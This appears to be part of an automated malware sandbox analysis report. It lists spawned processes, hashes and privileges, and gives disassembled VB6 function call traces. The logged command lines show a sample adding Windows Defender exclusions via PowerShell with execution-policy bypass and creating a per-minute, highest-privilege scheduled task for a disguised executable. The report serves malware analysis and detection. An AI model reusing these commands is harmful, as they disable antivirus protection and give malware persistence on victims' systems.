MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	08:24:52
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:24:59
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'
Imagebase:	0x840000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:24:59
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	08:25:08
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Logon Application.exe'
Imagebase:	0x840000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:25:08
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:25:19
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Imagebase:	0x10000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:25:19
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	08:25:19
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Windows Logon Application.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Imagebase:	0xb80000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:25:19
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	08:25:32
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Windows Logon Application.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Imagebase:	0x7f0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	08:25:32
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	08:25:40
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Windows Logon Application.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windows Logon Application.exe"
Imagebase:	0x6e0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	08:25:40
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00410180 Relevance: 52.7, APIs: 35, Instructions: 220COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
__vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
__vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
#525.MSVBVM60(00000104), ref: 0041029C
__vbaStrMove.MSVBVM60 ref: 004102A7
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
__vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
__vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
#616.MSVBVM60(?,?,?,00000000), ref: 00410399
__vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
__vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
__vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
__vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
__vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
__vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
__vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
__vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
__vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
__vbaFreeStr.MSVBVM60 ref: 00410538
__vbaFreeStr.MSVBVM60 ref: 00410544

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$Free$AnsiMoveSystem$#525#616BoundsBstrChangeChkstkCloseConstruct2CopyDestructFindGenerateListNotificationUnicode
String ID:
API String ID: 1228785046-0
Opcode ID: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
Opcode Fuzzy Hash: 0e7fc902b34ffcf9e67cdb1769bf0c1f0fb471222fd1f6da1b4fc70dbbb803ea
Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54

Function 00408C50 Relevance: 670.6, APIs: 377, Strings: 5, Instructions: 2055COMMON

Download Yara Rule

APIs

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00408C5A
__vbaStrCopy.MSVBVM60 ref: 00408C67
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C77
__vbaStrCopy.MSVBVM60 ref: 00408C8F

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?), ref: 00408CA3
__vbaStrCopy.MSVBVM60 ref: 00408CB0
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CC0
__vbaStrCopy.MSVBVM60 ref: 00408CD8

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

__vbaStrMove.MSVBVM60(?), ref: 00408CEC
__vbaStrCopy.MSVBVM60 ref: 00408CF9
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D09
__vbaStrCopy.MSVBVM60 ref: 00408D21
__vbaStrMove.MSVBVM60(?), ref: 00408D35
__vbaStrCopy.MSVBVM60 ref: 00408D42
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D52
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
__vbaStrMove.MSVBVM60 ref: 00408DC0
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
__vbaStrMove.MSVBVM60 ref: 00408DD9
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
__vbaStrMove.MSVBVM60 ref: 00408DF0
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
__vbaStrMove.MSVBVM60 ref: 00408E08
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
__vbaStrMove.MSVBVM60 ref: 00408E21
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
__vbaStrMove.MSVBVM60 ref: 00408E38
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
__vbaStrMove.MSVBVM60 ref: 00408E51
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
__vbaStrMove.MSVBVM60 ref: 00408E69
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
__vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
__vbaStrMove.MSVBVM60 ref: 00408ED9
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
__vbaStrMove.MSVBVM60 ref: 00408EF2
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
__vbaStrMove.MSVBVM60 ref: 00408F09
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
__vbaStrMove.MSVBVM60 ref: 00408F21
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
__vbaStrMove.MSVBVM60 ref: 00408F3A
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
__vbaStrMove.MSVBVM60 ref: 00408F51
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
__vbaStrMove.MSVBVM60 ref: 00408F6A
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
__vbaStrMove.MSVBVM60 ref: 00408F82
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
__vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
__vbaStrMove.MSVBVM60 ref: 00408FF2
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
__vbaStrMove.MSVBVM60 ref: 0040900B
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
__vbaStrMove.MSVBVM60 ref: 00409062
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
__vbaStrMove.MSVBVM60 ref: 0040907B
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
__vbaStrMove.MSVBVM60 ref: 00409092
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
__vbaStrMove.MSVBVM60 ref: 004090AB
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
__vbaStrMove.MSVBVM60 ref: 004090C3
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
__vbaStrMove.MSVBVM60 ref: 004090DA
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
__vbaStrMove.MSVBVM60 ref: 004090F3
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
__vbaStrMove.MSVBVM60 ref: 0040910C
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
__vbaStrMove.MSVBVM60 ref: 00409123
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
__vbaStrMove.MSVBVM60 ref: 0040913B
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
__vbaStrMove.MSVBVM60 ref: 00409154
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
__vbaStrMove.MSVBVM60 ref: 0040916B
__vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
__vbaStrMove.MSVBVM60 ref: 00409022

Part of subcall function 00410180: FindCloseChangeNotification.KERNELBASE(?), ref: 004104ED
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544

__vbaStrMove.MSVBVM60 ref: 00408F99

Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9

__vbaStrMove.MSVBVM60 ref: 00408E80

Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338

__vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
#580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
__vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
#600.MSVBVM60(00000008,00000000), ref: 00409273
__vbaFreeVar.MSVBVM60 ref: 00409282
__vbaSetSystemError.MSVBVM60 ref: 004092A4
__vbaStrCopy.MSVBVM60 ref: 004092B9
__vbaStrMove.MSVBVM60(?), ref: 004092CD
__vbaStrCopy.MSVBVM60 ref: 004092DA
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354

Strings

RO, xrefs: 00409EF6, 00409F5D
Once, xrefs: 00409F1B, 00409F81
SE, xrefs: 00409258
PR, xrefs: 00409516
~, xrefs: 00409FD4

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$Copy$List$Error$System$Ansi$#516#631$Bstr$#525#537#580#600#616BoundsChangeCheckChkstkCloseConstruct2DestructFindGenerateHresultNotificationUnicode
String ID: PR$ RO$ SE$Once$~
API String ID: 3290240664-1255219571
Opcode ID: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
Instruction ID: 7d3b41f73b1118d4cefcb71df8c3f05656ff7fe774afdbe4e31ac6fe335ab197
Opcode Fuzzy Hash: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
Instruction Fuzzy Hash: A213EC75910208EFDB14EFE0EE58ADE7B79FF48301F108169F606A72A0DB745A49CB58

Function 00407A50 Relevance: 316.2, APIs: 178, Strings: 2, Instructions: 1164COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6), ref: 00407A6E
__vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,004025E6), ref: 00407AC6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407B2C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000068), ref: 00407B8C
__vbaFreeObj.MSVBVM60 ref: 00407BB5
__vbaEnd.MSVBVM60 ref: 00407BCD
__vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407BED
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407C53
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,0000007C), ref: 00407CAE
__vbaFreeObj.MSVBVM60 ref: 00407CC9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004053E4,000001BC), ref: 00407D0D
__vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 00407D3F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,00000014), ref: 00407DA5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407E02
#618.MSVBVM60(?,00000001), ref: 00407E20
__vbaStrMove.MSVBVM60 ref: 00407E2B
__vbaStrCmp.MSVBVM60(004055FC,00000000), ref: 00407E37
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00407E55
__vbaFreeObj.MSVBVM60(?,?,004025E6), ref: 00407E61
__vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407E90
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00407EF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00407F53
__vbaStrMove.MSVBVM60 ref: 00407F84
__vbaFreeObj.MSVBVM60 ref: 00407F8D
__vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,004025E6), ref: 00407FB2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408018
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000050), ref: 00408075
__vbaStrCat.MSVBVM60(004055FC,?), ref: 00408096
__vbaStrMove.MSVBVM60 ref: 004080A1
__vbaFreeStr.MSVBVM60 ref: 004080AA
__vbaFreeObj.MSVBVM60 ref: 004080B3
__vbaStrCopy.MSVBVM60 ref: 004080C8
__vbaStrMove.MSVBVM60(?), ref: 004080DC
__vbaStrCopy.MSVBVM60 ref: 004080E9
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004080F9
__vbaNew2.MSVBVM60(004055D8,0041B8D8,?,?,?,?,?,004025E6), ref: 0040811C
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055C8,00000014), ref: 00408182
__vbaHresultCheckObj.MSVBVM60(00000000,?,004055E8,00000058), ref: 004081DF
__vbaStrCat.MSVBVM60(?,?), ref: 004081FF
__vbaStrMove.MSVBVM60 ref: 0040820A
__vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408216
__vbaStrMove.MSVBVM60 ref: 00408221
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040822F
__vbaStrMove.MSVBVM60 ref: 0040823A
#517.MSVBVM60(00000000), ref: 00408241
__vbaStrMove.MSVBVM60 ref: 0040824C
__vbaStrCopy.MSVBVM60 ref: 00408259
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?), ref: 00408275
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408281
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408296

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082AA
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082B7
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082C7
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082DF

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
